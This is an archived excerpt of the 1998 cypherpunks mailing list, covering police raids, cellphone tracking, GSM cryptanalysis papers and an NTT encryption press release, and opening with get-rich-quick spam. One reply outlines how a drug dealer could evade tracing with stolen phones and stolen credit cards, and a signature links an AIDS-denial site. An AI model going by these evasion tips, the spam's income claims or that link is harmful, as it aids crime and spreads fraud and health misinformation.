Content-Type: text/plain



You just stumbled upon something big !


Pt or FT !No competition !No selling ! Not MLM !

$1,000 - $5,000 per week from home, within 30 days !

Daily conference calls !

Complete training and support !

Leads available !

Dear Friend,

	If your tired of the hype , then read on :

Everyone wants more and we have the system that can get it......

Over 20,000 doctors, lawyers, CPA's and business people, last year alone, started using our system to create wealth in their spare time.
 Many are making in excess of $50,000 per month. Speak to them yourself ! 

" I'm a chiropractor in Hawaii and use this system in my spare time to consistently make over $4,000 per week !"  Michael F. Makawao, HI

" I'm a single nurse and mom with 5 kids, have been using the system for 18 months,and last year alone, earned $400,000 !  " Melissa F., Parkersburg, IA

" I was a practicing priest for many years, retired and started using this system. Last week I earned $33,000 and bought my wife a new van - CASH " Jim P., Port Angeles, WA

These people were taught how to turn a one time investment into big money !
Is the timing right for you ?Find out on our discovery call. Risk free and pressure free !

1 800 452 4981    Outside the U.S. 1 619 678 4228  ext. 0630

To have your name removed form our list, send an email with remove in subject byebye@planetmail.com. We filter against all universal remove lists.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: webface@moneymania.com
Date: Sat, 25 Apr 1998 20:36:38 -0700 (PDT)
To: <cypherpunks-unedited@toad.com>
Subject: Tons Of FREE Stuff
Message-ID: <199804260336.RAA00794@pele.WURLDLINK.NET>
MIME-Version: 1.0
Content-Type: text/plain



Hi There ,

>From the USA Today, April 16, 1998:

"The Commerce Department reported that
NET Traffic is DOUBLING EVERY 100 DAYS,"
and "that by the year 2002, Internet Commerce 
will reach $326 BILLION."

#1 REAL MONEYMAKING Opportunity 
LOADED with FREE Info on HOW to 
MAKE AT LEAST $300 a day EVERY day!
NO OBLIGATION! NOT MLM!
http://www.moneymania.com/madpack.htm

loads More...

http://www.moneymania.com













From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: decius@ninja.techwood.org (Decius 6i5)
Date: Sat, 25 Apr 1998 16:40:26 -0700 (PDT)
To: cypherpunks@toad.com
Subject: Surveillance of police raids...
Message-ID: <m0yTClH-000017C@r32h102.res.gatech.edu>
MIME-Version: 1.0
Content-Type: text/plain


> But the knock on the door and the presentation of a warrant is
> increasingly being replaced by these "dynamic entries." Given that this
> is exactly how teams of home invaders hit houses, and given the element
> of surprise, is it any wonder that many of us keep loaded and ready
> semiautomatic rifles and shotguns to repel such invasions? (And many of
> us use SS-109 green tips, which essentially punch right through
> ballistic vests up to Class III. How many SWAT members need to die in
> such raids before the courts restore the Fourth Amendment?)

These sort of "dynamic entries" and other cases of clearly burtal behavior
by the police are fearsome indeed. They also appear to be a problem the
public is very unhappy about... Rodney King riots to the public reaction
to Waco and similar incidents. It is obvious that if you hire a bunch of
people for an adrenaline intensive job where they will be taking down "bag
guys" with machine guns they are going to be difficult to keep in line. 
These aren't lawyers or philosophers. Its not the right/wrong for these
people but the thrill of the hunt.

However, I don't beleive I've seen any evidence that "keeping loaded and
ready semiautomatic rifles" is an effective response. Most people who
"fight back" seem to be killed quickley or (rarely) they get involved in
long standoffs which often end in death. Eitherway, if you do make it out
alive you will likely have racked enough charges against you in the
process of defending yourself that the original legal issue pales by
comparison. Do you know of anyone who has stood up to police raiders and
WON?   

The majority of cases that I have seen where abusive police "got theirs"
occured in a court room and not a "compound." The Steve Jackson Games
decision put a pre-emptive stop to a lot of unreasonable searches... It
doesn't really matter if the Secret Service understands *WHY* it was in
the wrong. What matters is that police agencies are aware that they can't
walk into a house and take everything with a plug on the premise that they
are investigating computer crime. Like it or not...

Now the issue of police lieing about a raid in court is at hand, and this
brings an interesting twist here for privacy advocates. Video surveillance
is an effective weapon against police brutality. Thats a fact. Many police
agencies have taken to installing "tamper proof" cameras in patrol cars.
These are effective in court when the cops are in "the right."
(Philisophical arguments about anarchy vs. democracy notwithstanding...)
They are also quite effective when the cops are in the wrong. One officer
in Atlanta was stupid enough to engage in an unprovocted beating of a
suspect right in from of his own camera. He's out of a job now.

One could imagine a CCTV system in a home with an easily accessable switch
which engages it. And X-10 remote is handy and could be programmed to do
this. The cameras could be designed to be unobtrusive. For real security
the video data would need to be streamed (over the net?) to a remote site
for storage and the system must be difficult to shut down under duress
without evidence of such coersion being saved. Audio data could also be 
saved. The nice thing about this is that the surveillance is in the
control of the home owner.  

Problem with surveillance is that its a weapon. I don't want to be
surveilled. However, I might wish to surveil others for my protection as
in the above example.          

	I absolutely hate the idea of cameras in the workplace or in
general public places. Especially in the hands of the government rather
than store owners. Crytography can protect you from phone taps, but what
can protect you from a network of digital cameras connected to face
recognition software? Thats the direction I see this overall issue
heading. One can envision a future in which all your online dealings can
be extremely secure and anonymized by virtue of crypto, but your
movements in the physical world are tightly monitored by automated video
processing systems...  

-- 
        */^\*  Tom Cross AKA Decius 615 AKA The White Ninja  */^\* 
                       Decius@ninja.techwood.org

"If the economic, social and political conditions... do not offer a basis 
for the realization of individuality, while at the same time people have 
lost those ties which gave them security... powerful tendencies arise to 
escape from freedom into submission." -- Erich Fromm





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Eric Murray <ericm@lne.com>
Date: Sat, 25 Apr 1998 17:49:52 -0700 (PDT)
To: decius@ninja.techwood.org
Subject: Re: Surveillance of police raids...
In-Reply-To: <m0yTClH-000017C@r32h102.res.gatech.edu>
Message-ID: <199804260049.RAA27679@slack.lne.com>
MIME-Version: 1.0
Content-Type: text/plain


Decius 6i5 writes:
> 
Tim May wrote:
> > But the knock on the door and the presentation of a warrant is
> > increasingly being replaced by these "dynamic entries." Given that this
> > is exactly how teams of home invaders hit houses, and given the element
> > of surprise, is it any wonder that many of us keep loaded and ready
> > semiautomatic rifles and shotguns to repel such invasions? (And many of
> > us use SS-109 green tips, which essentially punch right through
> > ballistic vests up to Class III. How many SWAT members need to die in
> > such raids before the courts restore the Fourth Amendment?)
> 
> These sort of "dynamic entries" and other cases of clearly burtal behavior
> by the police are fearsome indeed. They also appear to be a problem the
> public is very unhappy about... 

Not unhappy enough to make it stop.  I beleive that shows like "Cops"
teach people to accept police violence- it's always "in the right"
and the "perp" is always guilty.  Just another way that the System
tries to make a lie of "guilty until proven innocent".

[..]

> However, I don't beleive I've seen any evidence that "keeping loaded and
> ready semiautomatic rifles" is an effective response. Most people who
> "fight back" seem to be killed quickley or (rarely) they get involved in
> long standoffs which often end in death. Eitherway, if you do make it out
> alive you will likely have racked enough charges against you in the
> process of defending yourself that the original legal issue pales by
> comparison. Do you know of anyone who has stood up to police raiders and
> WON?   
> 
> The majority of cases that I have seen where abusive police "got theirs"
> occured in a court room and not a "compound." 

[..]

> Now the issue of police lieing about a raid in court is at hand, and this
> brings an interesting twist here for privacy advocates. Video surveillance
> is an effective weapon against police brutality.

[..]
 
> One could imagine a CCTV system in a home with an easily accessable switch
> which engages it. And X-10 remote is handy and could be programmed to do
> this. The cameras could be designed to be unobtrusive. For real security
> the video data would need to be streamed (over the net?) to a remote site
> for storage and the system must be difficult to shut down under duress
> without evidence of such coersion being saved. Audio data could also be 
> saved. The nice thing about this is that the surveillance is in the
> control of the home owner.  


Cool idea.  You could send streaming video (encrypted of course) to
a 'safe haven' which would store it until you need it to back
up your court case and send the vicious pigs to jail where they
belong.  Until you need it, it'll be safely stored and only you
can get to it.

However, there's two weak links in that- the net connection and
the safe haven server.  Once one set of cops gets nailed by
such a system, you can bet that word _will_ get around:  foil
any home surveilance system before the raid.  Of course that'll
be part of the 'evidence gathering' which is why you don't want the
cameras to simply record on tape in the first place- the cops will
seize the tapes as "evidence" and they'll become "lost" before trial.

The cops could cut your phone/ISDN/DSL line before the raid, but of course
that might tip you off.  Although with the rate that net connections go
down these days due to router failures, maybe it wouldn't.  

The other way for the cops to foil the system is to attack the
safe haven server.  Possibly just by tracking your traffic to the
server, then seizing all the server' operators computer equipment
(shutting down his business) as more 'evidence'.  A few cases of that
would convince most server operators that they should take up a different
business.

The third weak link is that the cops would simply kill you and your
family- if there's no survivors to sue, then whataver evidence you
have is worthless.


-- 
Eric Murray  Chief Security Scientist  N*Able Technologies  www.nabletech.com
(email:  ericm  at  lne.com   or   nabletech.com)          PGP keyid:E03F65E5




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Smoking Man" <fibonacciprime@hotmail.com>
Date: Sun, 26 Apr 1998 01:31:20 -0700 (PDT)
To: cypherpunks@toad.com
Subject: Re: Position escrow
Message-ID: <19980426083047.9650.qmail@hotmail.com>
MIME-Version: 1.0
Content-Type: text/plain






























>    This is a really difficult issue.
>
>And how.  
>
>How does this interact with phones whose     What, like a party line?
>access (telephone) number is non-unique?
>Could where I am calling from be divorced    If the standard of COM
>from what instrument I am using to call?     is uniform, yes.
>Is there a parallel between smearing the
>signal over a spectrum of radio frequencies  Radio frequencies are
>and smearing the identifying information     a physical representation
>over a spectrum of numbers? Could calls      of numbers...YES.
>to 911 carry no phone number but just
>"here I am" information -- a panic button    They could, and what if
>function, in other words?                    you hang-up in distress.
>
>I imagine I sound like someone calling in    There are no experts here.
>to an ASK THE EXPERTS radio show...          They don't broadcast.
>
>--dan
>
>

______________________________________________________
Get Your Private, Free Email at http://www.hotmail.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Smoking Man" <fibonacciprime@hotmail.com>
Date: Sun, 26 Apr 1998 02:06:30 -0700 (PDT)
To: gbroiles@netbox.com
Subject: Re: Position escrow
Message-ID: <19980426090557.27270.qmail@hotmail.com>
MIME-Version: 1.0
Content-Type: text/plain



















































>I might wish that the government had the
>means to track every automobile's location.

...Planes come standard with ILR? (International Locator Radio).
Cars hav accidents too often for that...too expensive to serv it
maybe.








>What we need are cellphone remailers.

Some might. I'm not sure how much though.

>Third parties who want to use ordinary/automated cellphone tracking 
systems
>will get the physical address of the relay, not that of the phone.

Hmmmm. Same principles as remailers...Latency? Relay switching?
>number of antennae/base stations that the regular cellphone folks do, 
so
>it'll be harder for them to use trianguation and timing to derive 
physical
>location.

Contrarily, the fewer the remailers, the EASIER--could be only
one remailer to compromise.
Realtime Mixmaster? Heh. Parallel MixMaster.


>>I expect the main countermeasure to cellular position tracking will be
>>the use of one-way pagers.

That depends on the protocol they use. Simplex? Old things. Probably.

>But one-way pagers are a dying technology - and I'll bet that within 
3-5
>years, it'll no longer be possible to turn off cellphones.








>>Perhaps if the "just turn it off" approach is widely promoted, the

Won't hav too. How many people does it take to keep a secret?
Anything you say or do offensively, wrongly, or illegally can and
probably will be used against you somehow, especially if you
mention it or you're caught.
You hav the right to be silent.
No one has the right to understand you if you giv up that right.
You may purchase the right to authenticate financial transactions.

______________________________________________________
Get Your Private, Free Email at http://www.hotmail.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Sun, 26 Apr 1998 05:42:20 -0700 (PDT)
To: cypherpunks@toad.com
Subject: GSM A5 Papers
Message-ID: <199804261242.IAA30483@camel7.mindspring.com>
MIME-Version: 1.0
Content-Type: text/plain


We would be grateful for assistance in obtaining copies of the
following papers, particularly the first:

  S J Shepherd, "Cryptanalysis of the GSM A5 Cipher Algorithm",
  IEE Colloquium on Security and Cryptography Applications to
  Radio Systems, Digest No. 1994/141, Savoy Place, London, 3
  June 1994, (COMMERCIAL-IN-CONFIDENCE).

  S J Shepherd, "An Approach to the Cryptanalysis of Mobile
  Stream Ciphers", IEE Colloquium on Security and Cryptography
  Applications to Radio Systems, Digest No. 1994/141, Savoy
  Place, London, 3 June 1994, (COMMERCIAL-IN-CONFIDENCE).

  S J Shepherd, "Public Key Stream Ciphers", IEE Colloquium on
  Security and Cryptography Applications to Radio Systems,
  Digest No. 1994/141, pp 10/1-10/7, Savoy Place, London, 3 June
  1994.

These are listed on Dr Shepherd's bio at:

     http://vader.brad.ac.uk/finance/SJShepherd.html






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Sun, 26 Apr 1998 08:54:32 -0700 (PDT)
To: cypherpunks@toad.com
Subject: Futures Doomed
In-Reply-To: <v04003a00b167dd28d1bb@[139.167.130.246]>
Message-ID: <199804261554.LAA13050@camel7.mindspring.com>
MIME-Version: 1.0
Content-Type: text/plain


More on the future of money in the NYT today, "Crime's 
New Cash of Choice," the Euro, which plans larger 
denominations than the mobs' favorite $100 US. If the 
Euro catches on, it says, the USG could lose billions in 
interest-free loans on stashed C-notes, unused except 
in the underground -- which the US turns a blind tax eye 
to because more revenue comes from the seignoriage.

   http://www.nytimes.com

Or:

   http://jya.com/euro-threat.htm

On competing millenarist doomsaying, the NYT has on 
page one a report on an exercise last month which 
revealed how ill-prepared the US is to handle a germ 
attack, with PDDs coming shortly to address anti-terrorism 
(with a Czar), and the squabbles among competing 
agencies for intel fed shock scenarios leading to terrific 
stockpiles of money antidotes, preferrably all non-fictional, 
but not likely since the report says that the PDD the 
President gets aroused at is Richard Preston's "The 
Cobra Event" -- sold out for miles around the bunkers'
intake vents of the germs' most wanted.

   http://jya.com/germ-threat.htm

Bear in mind that Kennedy's hard-on for James Bond
shaped a generation of whiz kids looking for gory galore,
the fathers of natsec implanted kids now in late boomer 
breakdown seeing the future all too clear, inclined to
predict their end The End.








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Sun, 26 Apr 1998 09:21:48 -0700 (PDT)
To: cypherpunks@toad.com
Subject: Re: Hettinga promoted to Head Critic In Charge...
In-Reply-To: <v04003a01b167e0057e05@[139.167.130.246]>
Message-ID: <199804261621.MAA10402@camel7.mindspring.com>
MIME-Version: 1.0
Content-Type: text/plain


Asgaard wrote:

>But Timothy C. May never 'claimed' any such things outside of an
>entirely humorous context. On the other hand, *you* obviously had
>some kind of fit some months back, feeling singled out by 'M', but
>now are remembering it completely backwards.

This is true. And helpful to file for future reference. Data show
that Tim's thoughts are not what they appear to be in text.

The needle -- yes, the mind-reading machine's analog -- jumps
all the way to left, Bizarre Humor, whenever no mercy emissions
emanate from the hilltop bastion's outgoing array.

Only unclues take Tim's deadpan assays for deadshot intent.
Those black talons are black jokes, Bob, laugh. You never been
shot at to keep you dancing? Don't stop, though, or the fun ends.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: ichudov@algebra.com (Igor Chudov @ home)
Date: Sun, 26 Apr 1998 12:44:24 -0700 (PDT)
To: cypherpunks@toad.com (Cypherpunks)
Subject: 80% of cash is in underground economy!
Message-ID: <199804261943.OAA02176@manifold.algebra.com>
MIME-Version: 1.0
Content-Type: text


A surprising finding from New York Times:

Economists once believed that just 10 percent of all currency in
circulation was tied up in the underground economy. Now it turns out
that 80 percent is closer to the mark. Most of it is in $100 bills,
which are the largest available and now account for well over half the
value of the nation's paper money.

American banks and businesses hold very little cash. American
households are also loath to keep much of it lying around. Yet
according to the Federal Reserve there is enough currency floating
around to make it appear that every American family of four has
$6,000 or so in cash stashed under the mattress, including three
dozen $100 bills. And despite the ubiquitousness of credit cards,
ATMs and electronic transfers, the sea of cash has been growing
much faster than the nation's gross national product.

	- Igor.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <bill.stewart@pobox.com>
Date: Sun, 26 Apr 1998 23:52:37 -0700 (PDT)
To: Eric Murray <decius@ninja.techwood.org
Subject: Re: Surveillance of police raids...
In-Reply-To: <m0yTClH-000017C@r32h102.res.gatech.edu>
Message-ID: <3.0.5.32.19980426194558.00993820@popd.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


At 05:49 PM 4/25/98 -0700, Eric Murray wrote:
>Not unhappy enough to make it stop.  I beleive that shows like "Cops"
>teach people to accept police violence- it's always "in the right"
>and the "perp" is always guilty.  Just another way that the System
>tries to make a lie of "guilty until proven innocent".

Fox TV is currently running a week of Really Exciting High-Speed
Police Car Chases and Really Scary Police Shootout Videos.
I doubt that the raid on Don Scott's farm is included....

On the good side, they're also running a few shows on privacy
and identity theft, though tonight's edition mainly talked about
getting of junk mail lists.  And they run The Simpsons.
On the somewhat hypocritical side, they've got a series of 
commercials about <some issue side 1> <some issue side 2> 
"Is this for the media to decide?"
"our news is really objective, just the facts, you decide",
while also running America's Most Wanted Thought Criminals
and "Cops Are Cool - Heh Heh - Heh Heh".

				Thanks! 
					Bill
Bill Stewart, bill.stewart@pobox.com
PGP Fingerprint D454 E202 CBC8 40BF  3C85 B884 0ABE 4639




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Illuminatus Primus <vermont@gate.net>
Date: Sun, 26 Apr 1998 17:19:25 -0700 (PDT)
To: cypherpunks@toad.com
Subject: Screw You Packet
Message-ID: <Pine.LNX.3.96.980426201711.13720Q-100000@oto.gate.net>
MIME-Version: 1.0
Content-Type: text/plain


http://www.theonion.com/onion3315/screwyoupacket.html

   BACK * 22 April 1998
   _________________________________________________________________
   
         WASHINGTON, DC--In an effort to streamline degradation of the
   American populace and consolidate all forms of bureaucratic hassle
   into one convenient mailing, federal officials announced Monday that,
   beginning in 1999, the government will issue all citizens an annual
   "Screw You" packet.
   
         The packet, which is to be distributed in conjunction with
   federal tax forms, will condense the government's countless methods of
   abuse into a single handy 9x12 envelope.
   
         "The federal government's current citizen-persecution system is
   inefficient and wasteful," said Sen. Alfonse D'Amato (R-NY), who
   spearheaded the congressional task force that developed the "Screw
   You" packet. "This compact packet is not only cost-effective, it's
   user-friendly and intuitive. Simple instructions and easy-to-remember
   acronyms make the filing process as quick and painless as possible."
   
         The packet's easy-to-understand forms will free citizens of the
   nightmare of red tape normally associated with federal filings.
   Filling out and returning the "Screw You" packet is mandatory and
   easy. Here's how:
   
         The first step is to calculate your Economic Mobility Factor
   using the convenient EMF 1138 calculation sheet included in the
   packet. Those with an Economic Mobility Factor of 90 or above may mail
   or fax forms SC0089-L and SC0065-DD to their local Screw You EMF
   Processing Center. They may also drop them off at SYEMFPC kiosks
   conveniently set up at post offices and public libraries across the
   U.S.
   
         Those with an EMF between 30 and 90 must submit their forms in
   person to a Screw You EMF Processing Center Clerk. Such applicants
   must meet with the SYEMFPCC, and should arrange appointments via the
   State Application Auditing Appointment Bureau. Once an appointment
   date has been set by the SAAAB, a Screw You Appointment Confirmation
   Card will be mailed to you within three to four weeks.
   
         Upon receipt of the Screw You Appointment Confirmation Card,
   applicants will be required to register the appointment with the Screw
   You Appointment Registry Bureau. Failure to register the appointment
   within a 48-hour period will result in a fine automatically added to
   your estimated SYEMF-1138 quotient.
   
         The amount of the fine can be determined by using Screw You
   Fine/ Penalty Schedule 565612, which is available at all local
   Department of Fiduciary Adjustment branch offices. If there is no DFA
   office in your immediate Screw You zone, district, state or township,
   you should contact the Federal Department of Fiduciary Adjustments in
   Washington, D.C., and ask to speak to a Citizen's Outreach
   Representative who will look up the predetermined fine on
   SYF/PS565612.
   
         There is a $50 processing fee for any and all telephone queries
   to the FDFA. Those wishing to charge the $50 fee can do so by making
   three copies of forms SYEMF-1138, KSJU-387-SK, SKSP-90-EZ, and
   SC-2389, along with computer code 0100010 and ACC-842, and forwarding
   them to the Federal Department of Fiduciary Adjustments Postal
   Processing Center in Colorado Springs, CO.
   
         Forms received by the FDFAPPC will be processed and returned to
   applicants within six to eight weeks. Those who wish to have their
   forms returned in less than six to eight weeks may file a Fiduciary
   Calculation Acceleration Form 9056 at their local SYEMFPC.
   
         FCAF-9056 forms will be available Monday to Tuesday between the
   hours of 7:45 a.m. and 8:15 a.m., and are distributed on a first-come,
   first-serve basis. Completed forms should be returned to the FDFA in
   Washington, DC. All FCAF-9056 forms that have not cleared
   authentication via the FDFA in Washington, DC, will be rendered null
   and void, and will not be forwarded to the FDFAPPC in Colorado
   Springs.
   
         Applicants who misdirect their FCAF-9056 forms will draw a $10
   per SYEMF-1138 fine. The fine must be paid within 36 hours, or the
   applicant will be subject to house arrest and strip-search by the
   Armed Outreach Response Team, an independently operated division of
   the Screw You Outreach Consortium.
   _________________________________________________________________
   
   BACK * 22 April 1998
   (c) Copyright 1998 Onion, Inc., All rights reserved. View masthead for
   more information.
   Questions/comments? Please consult our contact information page.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Duncan Frissell <frissell@panix.com>
Date: Sun, 26 Apr 1998 18:33:56 -0700 (PDT)
To: John Young <cypherpunks@toad.com
Subject: Re: Futures Doomed
In-Reply-To: <v04003a00b167dd28d1bb@[139.167.130.246]>
Message-ID: <3.0.2.32.19980426213206.006917e0@panix.com>
MIME-Version: 1.0
Content-Type: text/plain


At 11:53 AM 4/26/98 -0400, John Young wrote:
>More on the future of money in the NYT today, "Crime's 
>New Cash of Choice," the Euro, which plans larger 
>denominations than the mobs' favorite $100 US. If the 
>Euro catches on, it says, the USG could lose billions in 
>interest-free loans on stashed C-notes, unused except 
>in the underground -- which the US turns a blind tax eye 
>to because more revenue comes from the seignoriage.

Why haven't the undergrounders adopted the SF1000 note (just under $700 these days)?  Nice denomination.

DCF




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Edwin E. Smith" <edsmith@IntNet.net>
Date: Sun, 26 Apr 1998 19:14:38 -0700 (PDT)
To: cypherpunks@toad.com
Subject: Re: Futures Doomed
In-Reply-To: <199804261554.LAA13050@camel7.mindspring.com>
Message-ID: <3.0.2.32.19980426221358.0085ea80@mailhost.IntNet.net>
MIME-Version: 1.0
Content-Type: text/plain


At 09:32 PM 4/26/98 -0400, you wrote:
>At 11:53 AM 4/26/98 -0400, John Young wrote:
>>More on the future of money in the NYT today, "Crime's 
>>New Cash of Choice," the Euro, which plans larger 
>>denominations than the mobs' favorite $100 US. If the 
>>Euro catches on, it says, the USG could lose billions in 
>>interest-free loans on stashed C-notes, unused except 
>>in the underground -- which the US turns a blind tax eye 
>>to because more revenue comes from the seignoriage.
>
>Why haven't the undergrounders adopted the SF1000 note (just under $700
these days)?  Nice denomination.
>
>DCF
>

When was the last time you bought $700 worth of crack? :-)


When freedom is outlawed.......Only outlaws will be free!

If cryptography is outlawed, pomz pvumbxt xjmm ibwf dszquphsbqiz.

Fun! Fast! Revealing! Try "The World's Smallest Political Quiz" at:
   http://www.self-gov.org/quiz.html

IS AIDS A GOVERNMENT/DRUG COMPANY HOAX?
   http://www.virusmyth.com/aids/index.htm




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Iwar <Iwar@aol.com>
Date: Sun, 26 Apr 1998 20:09:55 -0700 (PDT)
To: cypherpunks@toad.com
Subject: Fwd: Whitehouse news flash!!!
Message-ID: <1add694c.3543f6da@aol.com>
MIME-Version: 1.0
Content-Type: text/plain



Subject: Whitehouse news flash!!!
From: WhiteHouse@aol.com
Date: Sun, 26 Apr 1998 20:02:19 -0700 (PDT)
Reply-To: twang38@aol.com

<a href="http://free4you.hypermart.net/promo2.html">Click Here for more
information!!</a>





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <bill.stewart@pobox.com>
Date: Sun, 26 Apr 1998 23:53:51 -0700 (PDT)
To: Geraint Price <karn@qualcomm.com>
Subject: Re: Position escrow
In-Reply-To: <199804222049.NAA26335@servo.qualcomm.com>
Message-ID: <3.0.5.32.19980426233526.00983100@popd.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


>This technology already exists in Britain (I don't know about any other 
>countries), where you can buy a mobile without any subscription information 
>off the shelf. To use the mobile, you go and purchase a 'token' which allows 
>you to use the mobile on a pay-per-call basis much the same as a public phone. 
>I don't know the method of token implementation.
>
>The police have started kicking up a fuss over this technology as they claim 
>it hinders their investigation into criminal activity, because if they trace a 
>cellular phone which turns out to be one of this type then they can't pull the 
>info on the customer to go round knocking on doors.

As usual, some of the important questions are scale, threat model,
and economics.

If you're in the Retail Pharmaceuticals business, trying to
solve the problem for yourself and a few of your best customers,
it's much simpler than solving the problem for The Masses.
Steal some cellphones, or steal some credit cards and buy some
cellphones, or hire a street person to rent a cell phone for you.
If the cops know they're looking for cellphone 202-654-3210,
they can call you, but they don't know who you are,
and even direction finders may only tell them that
the holder of that phone is somebody walking down Pennsylvania Ave.
On the other hand, if the cops are looking for _you_,
they may not have your phone number.

The Cheesebox story was quite nice, and would work better today, 
with automated PBXs available - it would have worked
even better 10 years ago, when PBX hacking was easier.

Another small-scale solution is to use ham radio repeaters with
phone patches, assuming they're still widely available.
Tracing it tells the cops they need to go find an FCC RDF truck
to drive around South Silicon Valley looking for someone
with a pocket-sized 2m or 70cm handheld radio who doesn't
talk more than 1 minute at a time, or maybe just listens.
If they catch you, you could be in Big Big Trouble for using
a ham radio without a license!

Another part of the scale is that not only is tracing a lot of work,
as others have pointed out, but not everybody goes taunting
Tsutomo and continually reminding everybody that they
haven't yet caught him, the way Dread Pirate Mitnick allegedly did.
If you're just Yet Another Pot Dealer, the FBI, NSA and FCC will 
probably tell your local police that a 75-gram dope deal is
less important that Cliff Stoll's 75-cent accounting difference.

On the other hand, maintaining a professional level of paranoia
all the time while doing business for a few years is more than
most FBI Targets are willing to bother doing.
				Thanks! 
					Bill
Bill Stewart, bill.stewart@pobox.com
PGP Fingerprint D454 E202 CBC8 40BF  3C85 B884 0ABE 4639




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Nobuki Nakatuji" <bd1011@hotmail.com>
Date: Mon, 27 Apr 1998 00:25:00 -0700 (PDT)
To: cypherpunks@toad.com
Subject: NTT Develops Secure Public-Key Encryption Scheme
Message-ID: <19980427072427.17097.qmail@hotmail.com>
MIME-Version: 1.0
Content-Type: text/plain


http://pr.info.ntt.co.jp/news/news98e/980416.html

          Nippon Telegraph and Telephone Corporation (NTT) announced 
today the development of 
          Efficient Probabilistic Public-Key Encryption (EPOC), a highly 
secure and mathematically 
          verified public-key encryption scheme that encrypts 
information on the transmission side 
          with a public-key (encryption key) and then decrypts it on the 
receiver side with a secret
          -key (decryption key).

          Encryption technology has become necessary to prevent 
information on the Internet from 
          being monitored by others without authorization. Public-key 
encryption is being widely 
          researched as a practical means of encrypting communication 
for security.

          The paramount feature of any public-key encryption schemes is 
ensuring that figuring out 
          the decryption key from the encryption key is as difficult as 
possible, to prevent 
          unauthorized use of ciphered information. The RSA*1 scheme 
uses factoring and the elliptic 
          curve encryption scheme*2 uses elliptic curve discrete 
logarithms, both of which can take 
          a supercomputer a very long time to determine the key. It has 
not been verified, however, 
          that either scheme provides the necessary security to prevent 
ciphered information from 
          being broken by a method other than factoring or elliptic 
curve discrete logarithms. The 
          Rabin encryption scheme*3, which also uses factoring, offers 
no algorithm other than 
          factoring for computing the complete plain-text, but it has 
not been proven that any bit 
          of plain-text cannot be computed.

          EPOC is a practical scheme in that the computer computation 
workload for encrypting and 
          decrypting is about the same as that for the RSA and elliptic 
curve encryption schemes. 
          Also, EPOC is a highly secure scheme which uses a trapdoor 
discrete logarithm*4  as the 
          key mathematical technique and can be broken only by 
factoring. Factoring is difficult 
          to accomplish, even with a supercomputer, and the probability 
that an efficient solution 
          to factoring will be found soon is very low, because 
mathematicians have been studying 
          the problem for years. EPOC ensures that partial, as well as 
whole, texts cannot be broken. 
          Finally, EPOC uses probabilistic encryption, so re-encrypted 
text is encrypted differently 
          each time, unlike the Rabin and RSA scheme, which use 
deterministic encryption.
           
          NTT now plans to incorporate EPOC in systems for enhanced 
security on the Internet. 
          Public-key encryption is used primarily for key distribution, 
because computation load is 
          greater than that for secret-key encryption*5, so EPOC will be 
used in existing encryption 
          modules for key distribution.

          Other applications will also be developed. In particular, EPOC 
is suitable for electronic 
          voting and anonymous telecommunication since it has a 
homomorphic property, unlike the RSA, 
          Rabin and elliptic curve encryption schemes. The theoretical 
details will be presented at 
          Eurocrypt '98 in Finland this June. 


          Notes:  

          *1: The RSA scheme was developed by Rivest, Shamir, and 
Adleman in 1978 and is based on 
          the difficulty of factoring. It was the first public-key 
encryption scheme.

          *2: The elliptic curve encryption scheme was proposed 
independently by Miller and Koblitz 
          in 1985 and is based on the difficulty of elliptic curve 
discrete logarithms. The basic 
          technique is based on a scheme developed by Diffie and Hellman 
in 1976.

          *3: The Rabin scheme was developed by Rabin in 1979 and is 
based on the difficulty of 
          factoring. It was the first public-key encryption scheme to 
verify the impossibility of 
          breaking a complete text without factoring the public-key.
          *4: A trapdoor discrete logarithm is a newly discovered 
discrete logarithm problem that 
          can be solved only if a secret-key is known.

          *5: Secret-key encryption differs from public-key encryption 
in that the sender and the 
          receiver use the same key for encryption and decryption.





______________________________________________________
Get Your Private, Free Email at http://www.hotmail.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rabid Wombat <wombat@mcfeely.bsfs.org>
Date: Mon, 27 Apr 1998 14:52:36 -0700 (PDT)
To: TruthMonger <tm@replay.com>
Subject: Re: Justice
In-Reply-To: <3544F494.654@replay.com>
Message-ID: <Pine.BSF.3.91.980427034025.28653B-100000@mcfeely.bsfs.org>
MIME-Version: 1.0
Content-Type: text/plain



This is the best troll I've seen on the list in a while ...

On Mon, 27 Apr 1998, TruthMonger wrote:

> "Justice is incidental to law and order."
> ~ J. Edgar Hoover
> 
> 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: David Honig <honig@alum.mit.edu>
Date: Mon, 27 Apr 1998 09:40:33 -0700 (PDT)
To: cypherpunks@toad.com
Subject: LA DA's illegal wiretaps revealed ---LA Times
Message-ID: <3.0.5.32.19980427094006.007bcb60@otc.net>
MIME-Version: 1.0
Content-Type: text/plain



Fans of CALEA, take note.



                                                  Sunday, April 26, 1998 

             THE STATE 
             Can the L.A. Criminal-Justice System Work Without Trust?

             By CHARLES L. LINDNER

[excerpt] 
in the wake of the discovery that
deputy district attorneys assigned to its narcotics unit have relied on
secret wiretaps for years to gather evidence against their
clients--and no one, including judges, knew about the practice.
Beyond the obvious legal question of whether the district attorney
